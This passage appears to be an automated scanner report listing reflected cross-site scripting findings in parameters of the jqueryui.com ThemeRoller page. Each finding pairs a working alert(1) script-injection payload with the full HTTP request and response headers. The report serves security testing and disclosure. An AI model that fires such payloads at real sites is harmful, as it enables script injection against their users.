GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50110"><script>alert(1)</script>fa031faa443 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7900c"><script>alert(1)</script>cae816e79ac was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... ult=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpac ...[SNIP]...
1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94042"><script>alert(1)</script>2f54497d769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?94042"><script>alert(1)</script>2f54497d769=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:16:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e5e"><script>alert(1)</script>f8b31991ec3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49af1"><script>alert(1)</script>944ac9397d5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c37"><script>alert(1)</script>d85e670a993 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd3"><script>alert(1)</script>263e02daba7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32961"><script>alert(1)</script>b72e4eb2dae was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099